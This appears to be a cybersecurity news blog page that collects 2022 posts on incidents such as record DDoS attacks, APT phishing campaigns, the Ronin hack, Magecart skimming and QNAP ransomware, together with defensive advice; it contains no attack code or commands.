Search This Blog

Showing posts with label attacks. Show all posts

Extended DDoS Attack With 25.3B+ Requests Thwarted

 

On June 27, 2022, the cybersecurity firm Imperva mitigated a DDoS attack with over 25.3 billion requests. The attack, according to experts, sets a new record for Imperva's application DDoS mitigation solution. The attack, which targeted an unnamed Chinese telecommunications company, was notable for its duration, lasting more than four hours and peaking at 3.9 million RPS. 

“On June 27, 2022, Imperva mitigated a single attack with over 25.3 billion requests, setting a new record for Imperva’s application DDoS mitigation solution” reads the announcement. “While attacks with over one million requests per second (RPS) aren’t new, we’ve previously only seen them last for several seconds to a few minutes. On June 27, Imperva successfully mitigated a strong attack that lasted more than four hours and peaked at 3.9 million RPS.”

The Chinese telecommunications company had previously been targeted by large attacks, and experts added that two days later, a new DDoS attack hit its website, albeit for a shorter period of time. This record-breaking attack had an average rate of 1.8 million RPS. To send multiple requests over individual connections, threat actors used HTTP/2 multiplexing or combining multiple packets into one.

The attackers' technique is difficult to detect and can bring down targets with a limited number of resources.

“Since our automated mitigation solution is guaranteed to block DDoS in under three seconds, we estimate that the attack could have reached a much greater rate than our tracked peak of 3.9 million RPS.” continues Imperva.

This attack was launched by a botnet comprised of nearly 170,000 different IP addresses, including routers, security cameras, and compromised servers. The compromised devices can be found in over 180 countries, with the majority of them in the United States, Indonesia, and Brazil.

Akamai mitigated the largest DDoS attack ever against one of its European customers on Monday, September 12, 2022. The malicious traffic peaked at 704.8 Mpps and appears to be the work of the same threat actor as the previous record, which Akamai blocked in July and hit the same customer.

Montenegro's State Infrastructure Struck by Cyber Attack Officials

 

An unprecedented cyber attack on Montenegro's government digital infrastructure occurred, and the government promptly implemented measures to mitigate its impact. Montenegro immediately reported the attack to other NATO members. 

“Certain services were switched off temporarily for security reasons but the security of accounts belonging to citizens and companies and their data have not been jeopardised,” said Public Administration Minister Maras Dukaj. 

The attack, according to the Minister, began on Thursday night. The US embassy in Montenegro recommended US citizens limit their movement and travel within the country to the necessities and keep their travel documents up to date and easily accessible, fearing that the attack would disrupt government infrastructure for identifying people living in Montenegro and transportation. The National Security Agency issued a warning to critical infrastructure organisations.

“A persistent and ongoing cyber-attack is in process in Montenegro,” reported the website of the U.S. Embassy in the capital Podgorica. 

“The attack may include disruptions to the public utility, transportation (including border crossings and airport), and telecommunication sectors.” 

EPCG, the state-owned power utility, has switched to manual handling to avoid any potential damage, according to Milutin Djukanovic, president of EPCG. The company decided to temporarily disable some of its clients' services as a safety measure. The government believes the attack was carried out by a nation-state actor.

“Outgoing Prime Minister Dritan Abazovic called a session of the National Security Council for Friday evening to discuss the attack. Abazovic said it was politically motivated following the fall of his government last week,” reported Reuters.

Previous Attacks

Montenegro was targeted by the Russia-linked hacker group APT28 in June 2017 after it officially joined the NATO alliance, amidst strong opposition from the Russian government, which threatened retaliation.

Montenegro experienced massive and prolonged cyberattacks against government and media websites in February 2017, for the second time in a few months. FireEye researchers who analysed the attacks discovered malware and exploits associated with the notorious Russia-linked APT group known as APT28 (aka Fancy Bear, Pawn Storm, Strontium, Sofacy, Sednit, and Tsar Team).

Another massive attack was launched against the country's institutions during the October 2016 elections, sparking speculation that the Russian Government was involved. At the time, hackers launched spear phishing attacks against Montenegro, using weaponized documents related to a NATO secretary meeting and a visit by a European army unit to the country.

The hackers distributed the GAMEFISH backdoor (also known as Sednit, Seduploader, JHUHUGIT, and Sofacy), a malware used only by the APT28 group in previous attacks. Marshal Sir Stuart Peach, Chairman of NATO's Military Committee (MC), announced the Alliance's effort to counter Russian hybrid attacks in January 2020.

The term "hybrid warfare" refers to a military strategy that combines political warfare, irregular warfare, and cyberwarfare with other methods of influencing, such as fake news, diplomacy, lawfare, and foreign electoral intervention.

Researchers Discover Kimusky Infra Targeting South Korean Politicians and Diplomats

 

Kimusky, a North Korean nation-state group, has been linked to a new wave of nefarious activities targeting political and diplomatic entities in its southern counterpart in early 2022. 

The cluster was codenamed GoldDragon by Russian cybersecurity firm Kaspersky, with infection chains resulting to the implementation of Windows malware designed to file lists, user keystrokes, and stored web browser login credentials. South Korean university professors, think tank researchers, and government officials are among the potential victims. 

Kimsuky, also known as Black Banshee, Thallium, and Velvet Chollima, is a prolific North Korean advanced persistent threat (APT) group that targets entities globally, but with a primary focus on South Korea, to gather intelligence on various topics of interest to the regime.

The group, which has been active since 2012, has a history of using social engineering tactics, spear-phishing, and watering hole attacks to obtain sensitive information from victims.

Late last month, cybersecurity firm Volexity linked the actor to an intelligence-gathering mission aimed at siphon email content from Gmail and AOL using Sharpext, a malicious Chrome browser extension.

The latest campaign employs a similar tactic, with the attack sequence initiated by spear-phishing messages containing macro-embedded Microsoft Word documents supposedly comprising content related to geopolitical issues in the region. Alternative initial access routes are also said to use HTML Application (HTA) and Compiled HTML Help (CHM) files as decoys in order to compromise the system.

Whatever method is used, the initial access is followed by a remote server dropping a Visual Basic Script that is orchestrated to fingerprint the machine and retrieve additional payloads, including an executable capable of exfiltrating sensitive information.

The attack is unique in that it sends the victim's email address to the command-and-control (C2) server if the recipient clicks on a link in the email to download additional documents. If the request does not include the expected email address, a harmless document is returned.

To complicate matters even further, the first-stage C2 server forwards the victim's IP address to another VBS server, which compares it to an incoming request generated after the target opens the bait document. The two C2 servers' "victim verification methodology" ensures that the VBScript is distributed only when the IP address checks are successful, indicating a highly targeted approach.

"The Kimsuky group continuously evolves its malware infection schemes and adopts novel techniques to hinder analysis. The main difficulty in tracking this group is that it's tough to acquire a full-infection chain," Kaspersky researcher Seongsu Park concluded.

Researchers: AiTM Attack are Targeting Google G-Suite Enterprise Users

 

A large-scale adversary-in-the-middle (AiTM) phishing campaign targeting enterprise users of Microsoft email services has also targeted Google Workspace users. 

"This campaign specifically targeted chief executives and other senior members of various organizations which use [Google Workspace]," Zscaler researchers Sudeep Singh and Jagadeeswar Ramanukolanu detailed in a report published this month.

The AiTM phishing attacks are said to have begun in mid-July 2022, using a similar method to a social engineering campaign designed to steal users' Microsoft credentials and even circumvent multi-factor authentication. 

The low-volume Gmail AiTM phishing campaign also includes the use of compromised emails from CEOs to conduct additional social engineering, with the attacks also utilizing several compromised domains as an intermediate URL redirector to take victims to the final landing page.

Attack chains entail sending password expiry emails to potential targets that encompass an embedded malicious link to supposedly "extend your access," tapping which takes the recipient to Google Ads and Snapchat redirect pages that load the phishing page URL.

Aside from open redirect abuse, a second variant of the attacks uses infected sites to host a Base64-encoded version of the next-stage redirector in the URL, as well as the victim's email address. This intermediate redirector is a piece of JavaScript code that directs you to a Gmail phishing page.

In one case, the redirector page used in the Microsoft AiTM phishing attack on July 11, 2022, was revised to take the user to a Gmail AiTM phishing page, connecting the two campaigns.

"There was also an overlap of infrastructure, and we even identified several cases in which the threat actor switched from Microsoft AiTM phishing to Gmail phishing using the same infrastructure," the researchers said.

Overall, the findings suggest that multi-factor authentication safeguards alone are insufficient to defend against advanced phishing attacks, necessitating that users scrutinize URLs before entering credentials and avoid opening attachments or clicking on links in emails sent from untrusted or unknown sources.

‘Evil PLC’ Could Turn PLCs Into Attack Vectors

 

When one thinks of someone hacking a programmable logic controller, one usually think of the PLC as the end objective of the assault. Adversaries use other systems to get at what will eventually allow them to cause industrial damage. 

However, a Claroty Team 82 DefCon presentation asks the following question: what if someone exploited a PLC as a vector rather than the destination? The researchers feel that the "Evil PLC" attack scenario is novel: infecting every engineer who interfaces with a PLC with malicious malware. 

Claroty revealed a series of 11 additional vendor-specific vulnerabilities that would allow the attack as proof of concept. These flaws have been discovered in Ovarro TBOX, B&R (ABB) X20 System, Schneider Electric Modicon M340 and M580, GE MarkVIe, Rockwell Micro Control Systems, Emerson PACSystems and Xinje XDPPro platforms. All but the Emerson were issued CVEs. Claroty came up with the notion after trying to learn more about the opponents that attack their honeypots.

“We asked ourselves, how can we actively attack the attackers? We don't know anything about them. We cannot find them,” said Claroty director of research Sharon Brizinov. “And then we kind of had a eureka moment and we thought, okay, what if the PLC was to be weaponized?”

Claroty used a ZipSlip attack against vendors (Emerson, Ovarro, B&R, GE, and Xinje), a heap overflow against Schneider, and a deserialization attack against Rockwell to create an Evil PLC. Evil PLC, according to Claroty, would be suited for two assault scenarios. The first scenario would be if the PLC was the only entry point into a secure facility. Waiting for an engineer to connect to the PLC allows the attacker to infect the engineer's workstation. This might be sped up by encouraging an early inspection using the newfound access to the PLC.

“Once the attacker weaponized the PLC, maybe they deliberately cause a fault on the PLC. The engineer would be lured to the PLC to check what's going on with it,” said Brizinov. 

Another possibility is to take use of the large number of PLCs maintained by outside professionals. One engineer is linked to one PLC could spread malicious code across several enterprises. 

“Usually PLCs are the crown jewel. When we're talking about classic attack vectors in ICS domains we're always seeing the PLC as the endpoint, the end goal; but if we're playing with those ideas and shifting our thoughts a bit, we can we can get to new ways of how to defend and attack both networks,” Brizinov said. 

Alert! Large-Scale AiTM Attacks Targeting Enterprise Users

 

A new large-scale phishing effort has been reported that use adversary-in-the-middle (AitM) tactics to circumvent security safeguards and attack business email accounts. 

Zscaler researchers Sudeep Singh and Jagadeeswar Ramanukolanu said in a Tuesday report, "It uses an adversary-in-the-middle (AitM) attack technique capable of bypassing multi-factor authentication. The campaign is specifically designed to reach end users in enterprises that use Microsoft's email services." 

Fintech, lending, insurance, energy, manufacturing, and federal credit union verticals are major objectives in the United States, United Kingdom, New Zealand, and Australia. This is not the first time a phishing attack has been identified. Microsoft revealed this month that over 10,000 businesses had been targeted by AitM tactics to compromise accounts protected by multi-factor authentication since September 2021 (MFA). 

The ongoing campaign, which began in June 2022, starts with an invoice-themed email addressed to targets that include an HTML file with a phishing URL placed within it. Opening the attachment in a web browser takes the email recipient to a phishing website posing as a Microsoft Office login page, but not before fingerprinting the infected system to assess whether the victim is the targeted target. 

AitM phishing attacks go beyond standard phishing tactics aimed to steal credentials from unsuspecting users, primarily when MFA is implemented - a security barrier that prohibits the attacker from login into the account using just the stolen credentials. To get around this, the rogue landing page created using a phishing kit acts as a proxy, capturing and relaying all traffic between the client (i.e., victim) and the email server. 

"The kits intercept the HTML content received from the Microsoft servers, and before relaying it back to the victim, the content is manipulated by the kit in various ways as needed, to make sure the phishing process works," the researchers stated. 

This also includes replacing any links to Microsoft domains with identical connections to the phishing domain to guarantee that the back-and-forth with the phoney website continues throughout the session. According to Zscaler, the attacker manually logged into the account eight minutes after the credential theft, reading emails and verifying the user's personal information. 

Furthermore, compromised email inboxes are often used to send further phishing emails as part of the same campaign to conduct business email compromise (BEC) frauds. The researchers noted, "Even though security features such as multi-factor authentication (MFA) add an extra layer of security, they should not be considered as a silver bullet to protect against phishing attacks. With the use of advanced phishing kits (AiTM) and clever evasion techniques, threat actors can bypass both traditional as well as advanced security solutions."

US Government Alerts Americans of Rising SMS Phishing Attacks

 

The Federal Communications Commission (FCC) has cautioned Americans about an increase in SMS (Short Message Service) phishing attacks aimed at stealing their personal information and money. Such attacks are also known as smishing or robotexts (as the FCC refers to them), and the fraudsters behind them may utilise a variety of enticements to fool you into disclosing sensitive information. 

"The FCC tracks consumer complaints – rather than call or text volume – and complaints about unwanted text messages have risen steadily in recent years from approximately 5,700 in 2019, 14,000 in 2020, 15,300 in 2021, to 8,500 through June 30, 2022," the US communications watchdog's Robocall Response Team said [PDF]. 

"In addition, some independent reports estimate billions of robotexts each month – for example, RoboKiller estimates consumers received over 12 billion robotexts in June." 

Smishing baits reported to the FCC by American customers include statements concerning unpaid bills, package delivery concerns, bank account problems, or police enforcement activities. Links sending users to landing pages imitating bank websites and requesting them to authenticate a transaction or unlock frozen credit cards are among the most clever and persuasive baits used in text message phishing attempts. 

Phishing SMS messages may also be faked to make it look that the sender is someone you're more likely to trust, such as the IRS or a company one is familiar with. While some attackers will try to steal financial information, others are less fussy and will collect whatever personal information they can get their hands on to use in later frauds or sell to other bad actors. The FCC suggests the following methods to protect against SMS phishing attacks:
  • Do not respond to texts from unknown numbers or any others that appear suspicious.
  • Never share sensitive personal or financial information by text.
  • Be on the lookout for misspellings or texts that originate with an email address.
  • Think twice before clicking any links in a text message. If a friend sends you a text with a suspicious link that seems out of character, call them to ensure they weren't hacked.
  • If a business sends you a text you weren't expecting, look up their number online and call them back.
  • Remember that government agencies almost never initiate contact by phone or text.
  • Report texting scam attempts to your wireless service provider by forwarding unwanted texts to 7726 (or "SPAM").
"If you think you're the victim of a texting scam, report it immediately to your local law enforcement agency and notify your wireless service provider and financial institutions where you have accounts," the FCC added.

Cyber-attacks on Port of Los Angeles Doubled Since Pandemic

 

According to recent research, one of the world's biggest ports has witnessed an unusual spike in cyber-attacks since the outbreak began. The Port of Los Angeles' executive director, Gene Seroka, told the BBC World Service over the weekend that the facility receives roughly 40 million attacks every month. 

"Our intelligence shows the threats are coming from Russia and parts of Europe. We have to stay steps ahead of those who want to hurt international commerce. We must take every precaution against potential cyber-incidents, particularly those that could threaten or disrupt the flow of cargo,” he further added. 

Ransomware, malware, spear phishing, and credential harvesting attacks appear to be among the threats aimed against the facility, which is the busiest in the Western Hemisphere. The goal seems to harm the US economy in many situations, however, profits through extortion and data theft will also be a factor. 

Such dangers, if not adequately managed, can potentially exacerbate COVID-era supply chain snarls. Seroka said that port blockages will not be cleared completely until next year, even though the number of container ships waiting more than two days to offload has reportedly reduced from 109 in January to 20 today. 

"The past two years have proven the vital role that ports hold to our nation's critical infrastructure, supply chains and economy. It's paramount we keep the systems as secure as possible," Seroka expressed. 

The challenge is so acute that the port established one of the world's first Cyber Resilience Centers in collaboration with the FBI. It provides a single site for port stakeholders such as shipping corporations to receive, evaluate, and exchange threat intelligence. 

Ports have become such a popular target for cyber-criminals, particularly those aiming to undermine operations and extort businesses, due to their strategic significance to global trade.

Alert WordPress Admins! Uninstall the Modern WPBakery Plugin Immediately

 

WordPress administrators have been cautioned to uninstall a problematic plugin or risk a total site takeover. This threat is associated with a plugin that is no longer in use: Modern WPBakery page builder extensions. CVE-2021-24284 is a vulnerability in the plugin that allows "unauthenticated arbitrary file upload through the 'uploadFontIcon' AJAX action." 

As a result, attackers might upload malicious PHP scripts to the WordPress site, resulting in remote code execution and site takeover. There has been a significant surge in attacks due to this defunct WordPress relic. 

Researchers detected "many vulnerable endpoints" in Modern WPBakery in 2021, which might lead to the injection of malicious JavaScript or even the deletion of arbitrary data. The goal of the game this time is to upload rogue PHP files and then inject malicious JavaScript into the site. 

Approximately 1.6 million sites have been examined for the presence of the plugin by malicious actors, and current estimates imply that 4,000 to 8,000 websites are still hosting the plugin. Check and delete immediately. 

The current recommendation is to search for the plugin and then uninstall it as quickly as possible. It has been entirely abandoned, and no security updates will be sent. If anyone has it installed, it's only a matter of time until the exploiters find their way to your Modern WPBakery hosting website and begin collecting information. It's advised to as soon as possible, remove this out-of-date invitation to site-wide compromise.

Tor Browser 11.5 Adds Censorship Detection & Circumvention

 

Tor Project's flagship anonymizing browser has been upgraded to make it simpler for users to avoid government attempts to prohibit its usage in various locations. According to the non-profit organisation that controls the open source software, Tor Browser 11.5 would change the user experience of connecting to Tor from strongly censored locations. 

It replaces a "manual and confusing procedure" in which users have to maintain their own Tor Network settings to figure out how to utilise a bridge to unblock Tor in their location. Because various bridge settings may be required in different countries, the Tor Project stated that the manual effort placed an undue hardship on restricted users. 

Connection Assist is its answer, and it will automatically apply the bridge configuration that should perform best in a user's exact location. China, Russia, Belarus, and Turkmenistan are among the countries that have blocked the Tor Network. Volunteers from these and other impacted nations are encouraged to apply to be alpha testers so that their feedback may be shared with the community. 

The Tor Project has revised its Tor Network settings to improve the user experience for people who still want to manually configure their software. There is also a new HTTPS-only default option for users, which protects consumers by encrypting communication between their system and the web servers it communicates with. 

“This change will help protect our users from SSL stripping attacks by malicious exit relays, and strongly reduces the incentive to spin up exit relays for man-in-the-middle attacks in the first place,” it stated. 

Although the Tor Browser is often linked with illicit black web browsing, it is also a useful tool for activists, journalists, dissidents, and NGO workers working under harsh government regimes.

Homeland Security Warns Log4j’s 'Endemic' Threats for Years to Come

 

The US Department of Homeland Security (DHS) published the Cyber Safety Review Board's (CSRB) first report into the December 2021 Log4j incident, when a variety of vulnerabilities with this Java-based logging framework were revealed, this week. 

The report's methodology comprised 90 days of interviews and information requests with around 80 organisations and individuals, including software developers, end users, security specialists, and businesses. 

This was done to ensure that the board met with a wide range of representatives and understand the complexities of how different attack surfaces are constructed and defended. According to the report, although standardised and reusable "building blocks" are essential for developing and expanding software, they also allow any possible vulnerability to be mistakenly included in multiple software packages, putting any organization that uses those programs at risk. 

According to the report, while Log4j remains dangerous, the government-wide approach helped tone down the vulnerability. The board also noted the need for extra financing to help the open-source software security community, which is primarily comprised of volunteers. 

Industry experts, such as Michael Skelton, senior director of security operations at Bugcrowd, said of Log4J: “Dealing with it is a marathon, one that will take years to resolve. Java and Log4j are prevalent everywhere, not only in core projects but in dependencies that other projects rely on, making detection and mitigation not as simple an exercise as it may be with other vulnerabilities.” 

John Bambenek, the principal threat hunter at Netenrich, was more critical of the report’s timing, believing that “anyone still vulnerable is highly unlikely to read this report or in much of a position to do anything about it if they did. Most of the American economy is small to medium businesses that almost always never have a CISO and likely not even a CIO. Until we find ways to make the public without security budgets safe, no high-level list of best practices will move the ball significantly.” 

The CSRB report went on to state that, thankfully, it is unaware of any large Log4j-based attacks on critical infrastructure assets or systems, and that efforts to hack Log4j happened at a lesser level than many experts expected. 

The paper, however, emphasises that the Log4j incident is "not over" and will continue to be an "endemic vulnerability" for many years, with considerable risk persisting. The research concluded with 19 actionable recommendations for government and business, which were divided into four divisions. They were as follows:
  • Address Continued Risks of Log4j
  • Drive Existing Best Practices for Security Hygiene
  • Build a Better Software Ecosystem
  • Investments in the Future

Predatory Sparrow's Assault on Iran's Steel Industry

 

Predatory Sparrow, also known as Gonjeshke Darande, has accepted full responsibility for last month's cyberattacks on various Iranian steel factories and has now posted the first batch of top-secret papers on its Twitter account. 

The group distributed a cache of around 20 terabytes of data. It includes company paperwork revealing the steel plants' links to Iran's strong Islamic Revolutionary Guard Corps. The group stated in a series of tweets in both English and Persian that the cache was only the beginning of what will be disclosed. 

While claiming responsibility for the June 27 attack, the group also posted a photo and video purportedly showing damage to equipment at the state-owned Khouzestan Steel Company, one of Iran's biggest steel manufacturing factories. Although both the steel firm and the Iranian government denied any serious impact, sources suggest that the attack hampered industrial operations. 

The Predatory Sparrow group explained that the attacks were carried out with caution in order to safeguard innocent people. The group also stated that the hacks were in reaction to the Islamic Republic's actions. The group goes on to say that the enterprises were targeted by international sanctions and that they will continue to operate despite the limitations. 

Regardless of Predatory Sparrow's insistence that the attacks are autonomous, it is suspected that the Israeli government is supporting the hacktivist group, given the sophistication of the operation, the nature of the attacks, and the message preceding, during, and after what looks to be an attack. Aside from the steel facilities attack, the Predatory Sparrow group has claimed responsibility for other digital attacks on key Iranian targets, including the one that crippled Iran's state-controlled gasoline distribution in October 2021 and the one that hit the Iranian railway system in August 2021. While the Iranian government continues to deny the group's accusations, each cyber strike raises new concerns.

Hackers Used Fake LinkedIn Job Offer to Steal $625M

 

Earlier this year, Ronin Network (RON), the blockchain network behind the popular crypto games Axie Infinity and Axie DAO, experienced the greatest crypto attack against a decentralised financial network ever reported. 

The United States issued advice in May 2022, stating that highly competent hackers from North Korea were attempting to get work by posing as IT freelancers. The Axie Infinity attack was socially engineered, with the North Korean government-backed hacker organisation Lazarus into Sky Mavis' network by giving one of the company's workers a PDF file carrying malware. Lazarus' participation in such a high-profile breach should come as no surprise. 

In January 2022, analysts from several crypto security organizations concluded that North Korean hackers had stolen $1.3 billion from cryptocurrency exchanges throughout the world, with the famed Lazarus group as their top suspect. 

Axie Infinity Hack 

The employee, an ex-senior engineer at the firm, fell for the trap and opened the PDF, believing it was a high-paying job offer from another company. However, this firm did not exist in reality.

During the recruitment process, the ex-employee disclosed sensitive personal information that attackers utilised to steal from the organisation. Sky Mavis' staff are regularly threatened by sophisticated spear-phishing attempts on multiple social networks, according to the company. In this case, one person, who does not even work at Sky Mavis, was duped. 

How was Ronin hacked? 

According to The Block, at the time of the attack, Axie Infinity had nine validators from its proof-of-authority, an Ethereum-based sidechain Ronin. 

“The attacker managed to leverage that access to penetrate Sky Mavis IT infrastructure and gain access to the validator nodes,” Sky Mavis stated.

To get access to the company's networks, the attacker needed to seize five out of nine validators. The spyware-laced PDF allowed the attacker to gain control of four validators and get entry to the community-run Axie DAO (Decentralized Autonomous Organization), from which they gained control of the fifth validator. After breaching the network, the attackers took $25 million in USDC stablecoin and 173,600 ether (about $597 million) from Axie Infinity's treasury, totaling $625 million in crypto. 

Nonetheless, the Ronin sidechain upped the number of validators to 11 to improve security, and Sky Mavis is reimbursing Axie Players who lost crypto as a result of the hack. In April 2022, the company raised $150 million in funding. 

The US administration alleges that the assault was carried out by the renowned North Korean hacking organisation Lazarus. This organisation specialises in such attacks. This is hardly Lazarus' first foray into the blockchain sector. However, Lazarus using social engineering to infiltrate a company's networks is unusual. In reality, the Slovak internet security company ESET notified LinkedIn users in June 2020 about Lazarus' involvement in a complex LinkedIn recruiting fraud targeting military and aerospace industries.

Novel ToddyCat APT Attacking Microsoft Exchange Servers

 

ToddyCat APT has been targeting Microsoft Exchange servers in enterprises throughout Asia and Europe since at least December 2020. 

The ToddyCat APT  group boosted its attacks in February 2021 and is looking for unpatched Microsoft Exchange servers with ProxyLogon exploits to launch attacks on. A passive backdoor dubbed Samurai and a new Ninja trojan were identified while following the group's activity. Both types of malware take over compromised devices and migrate laterally throughout networks. 

Some of the organisations infiltrated by the gang in three separate countries were hacked at the same time by other Chinese-backed hackers using the FunnyDream backdoor. High-profile organisations from the government and military sectors are the targeted victims. The group appears to be focused on attaining essential goals that are linked with geopolitical objectives. 

Numerous waves of attacks 

The initial wave of strikes began in December 2020 and ended in February 2021. The group was solely targeting a few government entities in Vietnam and Taiwan at the time. Between February and May 2021, the second round of assaults began targeting organisations in a variety of nations, including Iran, Russia, India, and the United Kingdom. 

The group targeted the same set of nations in the following phase, which lasted through February 2022, as well as communities from Uzbekistan, Kyrgyzstan, and Indonesia. ToddyCat Group has expressed interest in the government and military sectors and is expected to continue operations. 

Organizations should employ threat intelligence services to remain up to date on emerging dangers and defend their networks. Additionally, they should utilise the given IOCs to improve threat detection.

Newly Detected Magecart Infrastructure Discloses the Scale of Ongoing Campaign

 

A recently discovered Magecart skimming campaign has its origins in an earlier attack activity dating back to November 2021. 

To that end, Malwarebytes revealed in a Tuesday investigation that two malware domains identified as hosting credit card skimmer code — "scanalytic[.]org" and "js.staticounter[.]net" — are part of a larger infrastructure used to carry out the attacks. 

Jérôme Segura stated, "We were able to connect these two domains with a previous campaign from November 2021 which was the first instance to our knowledge of a skimmer checking for the use of virtual machines. However, both of them are now devoid of VM detection code. It's unclear why the threat actors removed it, unless perhaps it caused more issues than benefits." 

Based on the other domains discovered, the earliest indication of campaign activity has been around since May 2020. Magecart is a cybercrime syndicate made up of dozens of subgroups that specialise in hacks involving digital credit card fraud through the injection of JavaScript code into e-commerce shops, often on checkout pages. 

Operatives obtain access to websites either directly or through third-party firms that provide software to the targeted websites. While the attacks first received attention in 2015 for targeting the Magento e-commerce platform (the term Magecart is a combination of "Magento" and "shopping cart"), they have now spread to other platforms, including a WordPress plugin called WooCommerce. 

According to a Sucuri study published in April 2022, WordPress has surpassed Magento as the leading CMS platform for credit card skimming malware, exceeding Magento as of July 2021, with skimmers hidden in websites as false photos and seemingly harmless JavaScript theme files. 

Furthermore, during the first five months of 2022, WordPress websites accounted for 61 per cent of known credit card skimmer malware detections, followed by Magento (15.6 per cent), OpenCart (5.5 per cent), and others (17.7 per cent). 

"Attackers follow the money, so it was only a matter of time before they shifted their focus toward the most popular e-commerce platform on the web," Sucuri's Ben Martin stated at the time.

QNAP NAS Devices Struck by eCh0raix Ransomware Attacks

 

The ech0raix ransomware has resumed targeting vulnerable QNAP Network Attached Storage (NAS) systems this week, as per user complaints and sample uploads on the ID Ransomware site.

ech0raix (also known as QNAPCrypt) began attacking QNAP customers in many large-scale waves in the summer of 2019 when attackers brute-forced their entry into Internet-exposed NAS equipment. Since then, victims of this ransomware strain have discovered and reported numerous further campaigns, in June 2020, May 2020, and a large wave of assaults targeting devices with weak passwords that began in mid-December 2021 (just before Christmas) and gradually declined towards early February 2022. 

A fresh series of ech0raix assaults have been validated by an increase in the amount of ID Ransomware submissions and users reporting getting affected on the BleepingComputer forums, with the first hit on June 8. 

Although just a few dozen ech0raix samples have been submitted, the real number of successful assaults is likely to be larger because only a subset of victims will utilize the ID Ransomware service to detect the ransomware that encrypted their devices. 

While this ransomware has been used to encrypt Synology NAS systems since August 2021, this time victims have solely reported attacks on QNAP NAS systems. The attack vector employed in the current ech0raix campaign is unknown until QNAP releases additional information on these attacks. 

How to Protect NAS Against Attacks 

While QNAP is yet to give a warning to consumers about these assaults, the firm has already recommended users secure their data from potential eCh0raix attacks 
  • by using stronger passwords for administrator accounts
  • activating IP Access Protection to protect accounts from brute force assaults, 
  • and preventing the use of the default port numbers 443 and 8080 
In this security advice, QNAP gives extensive step-by-step instructions for changing the NAS password, enabling IP Access Protection, and changing the system port number. 

Customers are also advised by the Taiwanese hardware manufacturer to stop Universal Plug and Play (UPnP) port forwarding on their routers to avoid exposing their NAS systems to Internet-based assaults. One can also stop SSH and Telnet connections and enable IP and account access prevention by following these step-by-step instructions. QNAP also urged users on Thursday to protect their devices against continuous DeadBolt ransomware threats. 

"According to the investigation by the QNAP Product Security Incident Response Team (QNAP PSIRT), the attack targeted NAS devices using QTS 4.3.6 and QTS 4.4.1, and the affected models were mainly TS-x51 series and TS-x53 series," the NAS maker stated.

"QNAP urges all NAS users to check and update QTS to the latest version as soon as possible, and avoid exposing their NAS to the Internet."

Cyber Agencies: Beware of State Actors Levelling up Attacks on Managed Service Providers

 

The United States, the United Kingdom, Australia, and Canada's cybersecurity agencies issued a second advisory this week, stating that cyberattacks against managed service providers (MSPs) are expected to escalate. 

According to the advice, if an attacker is able to access a service provider's infrastructure, ransomware or espionage activity could be carried out against the provider's customers. 

The nations advised, "Whether the customer's network environment is on-premises or externally hosted, threat actors can use a vulnerable MSP as an initial access vector to multiple victim networks, with globally cascading effects." 

"NCSC-UK, ACSC, CCCS, CISA, NSA, and FBI expect malicious cyber actors -- including state-sponsored advanced persistent threat groups -- to step up their targeting of MSPs in their efforts to exploit provider-customer network trust relationships." 

The MSP definition covers IaaS, PaaS, SaaS, process and support services, as well as cybersecurity services, for the purposes of this advice. The first piece of obvious advice is to avoid getting compromised in the first place. Beyond that, users should follow standard suggestions such as improving monitoring and logging, updating software, having backups, employing multi-factor authentication, segregating internal networks, using the least privilege approach, and removing old user accounts. Users should verify contracts for clauses that ensure MSPs have adequate security safeguards in place.

Further, the advisory stated, "Customers should ensure that they have a thorough understanding of the security services their MSP is providing via the contractual arrangement and address any security requirements that fall outside the scope of the contract. Note: contracts should detail how and when MSPs notify the customer of an incident affecting the customer's environment."
 
"MSPs, when negotiating the terms of a contract with their customer, should provide clear explanations of the services the customer is purchasing, services the customer is not purchasing, and all contingencies for incident response and recovery."

New Spear Phishing Campaign Targets Russian Dissidents

 

In Russia, a new spear-phishing campaign targeting dissenters with alternative views to those presented by the state and national media over the war in Ukraine is underway. The campaign distributes emails to government personnel and public servants, alerting them about software and online platforms that are illegal in the country. 

The mails contain a malicious attachment or link that sends a Cobalt Strike beacon to the recipient's computer, allowing remote operators to execute eavesdropping on the victim. The campaign was discovered and reported on by Malwarebytes Labs threat analysts, who were able to sample some of the bait emails. 

Various phishing methods

To persuade recipients to open the attachment, the phishing emails pretend to be from a Russian state organisation, ministry, or federal service. The main two spoofed organizations are the "Russian Federation Ministry of Information Technologies and Communications" and the "Russian Federation Ministry of Digital Development, Communications, and Mass Communications." 

To attack their targets with Cobalt Strike, the threat actors use three different file types: RTF (rich text format) files, archive attachments of malicious documents, and download links inserted in the email body. Since it involves the exploitation of CVE-2021-40444, a remote code execution flaw in the rendering engine used by Microsoft Office documents, the case of RTFs is the most interesting. 

All of the phishing emails are written in Russian, as expected, and they appear to have been created by native speakers rather than machine translated, implying that the campaign is being spearheaded by a Russian-speaking individual. Malwarebytes discovered simultaneous attempts to spread a deeply obfuscated PowerShell-based remote access trojan (RAT) with next-stage payload fetching capabilities in addition to Cobalt Strike. 

The campaign's targets are mostly employed by the Russian government and public sector, including the following organisations: 
  • Portal of authorities of the Chuvash Republic Official Internet portal
  • Russian Ministry of Internal Affairs
  • ministry of education and science of the Republic of Altai
  • Ministry of Education of the Stavropol Territory
  • Minister of Education and Science of the Republic of North Ossetia-Alania
  • Government of Astrakhan region
  • Ministry of Education of the Irkutsk region
  • Portal of the state and municipal service Moscow region
  • Ministry of science and higher education of the Russian Federation
As per the aforementioned organisations, phishing actors target persons in crucial positions who could cause problems for the central government by stirring anti-war movements.

This New Russian Cyclops Blink Botnet Targets ASUS Routers

 

Nearly a month after it was discovered that the malware used WatchGuard firewall appliances as a stepping stone to obtaining remote access to infiltrated networks, ASUS routers have been the target of a budding botnet known as Cyclops Blink. 

The botnet's primary objective is to develop an infrastructure for additional attacks on high-value targets, according to Trend Micro, given that none of the compromised hosts belongs to vital organisations or those that have an obvious value on economic, political, or military espionage. 

Cyclops Blink has been identified by intelligence services in the United Kingdom and the United States as a replacement framework for VPNFilter, a malware that has targeted network equipment, especially small office/home office (SOHO) routers and network-attached storage (NAS) devices. 

Sandworm (aka Voodoo Bear), a Russian state-sponsored actor has been linked to both VPNFilter and Cyclops Blink. It has also been tied to several high-profile cyberattacks, including the 2015 and 2016 attacks on the Ukrainian electrical grid, the 2017 NotPetya attack, and the 2018 Olympic Destroyer attack on the Winter Olympic Games. 

The complex modular botnet, c language, affects a variety of ASUS router types, with the company admitting that it is working on a patch to handle any potential exploitation. –  
  • GT-AC5300 firmware under 3.0.0.4.386.xxxx
  • GT-AC2900 firmware under 3.0.0.4.386.xxxx
